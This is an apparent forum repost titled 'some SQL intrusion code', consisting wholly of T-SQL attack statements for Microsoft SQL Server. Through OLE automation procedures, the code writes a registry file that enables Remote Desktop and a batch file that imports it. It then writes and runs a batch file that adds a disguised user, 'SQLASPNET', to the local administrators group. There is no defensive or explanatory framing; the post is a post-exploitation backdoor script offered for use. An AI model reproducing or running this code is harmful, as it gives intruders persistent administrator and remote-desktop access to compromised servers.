[转载]一些SQL入侵代码
来源:海洋顶端网 [url]http://haiyangtop.net/[/url]作者:leyou123
--写个修改注册表的文件
declare @o int,@f int,@t int,@ret int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'createtextfile',@f out,'C:\WINDOWS\Config\wfo.reg',1
exec @ret=sp_oamethod @f,'writeline',NULL,
'Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000'
--到入
declare @oq int,@fq int,@tq int,@retq int
exec sp_oacreate 'scripting.filesystemobject',@oq out
exec sp_oamethod @oq,'createtextfile',@fq out,'C:\WINDOWS\Config\wfo.bat',1
exec @ret=sp_oamethod @fq,'writeline',NULL,
'regedit /s C:\WINDOWS\Config\wfo.reg'
--加用户名
declare @o int,@f int,@t int,@ret int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'createtextfile',@f out,'C:\WINDOWS\Config\wfou.bat',1
exec @ret=sp_oamethod @f,'writeline',NULL,
'net user SQLASPNET /add
net localgroup administrators SQLASPNET /add'
declare @o int
exec sp_oacreate 'wscript.shell',@o out
exec sp_oamethod @o,'run',NULL,'C:\WINDOWS\Config\wfou.bat'-
页:
[1]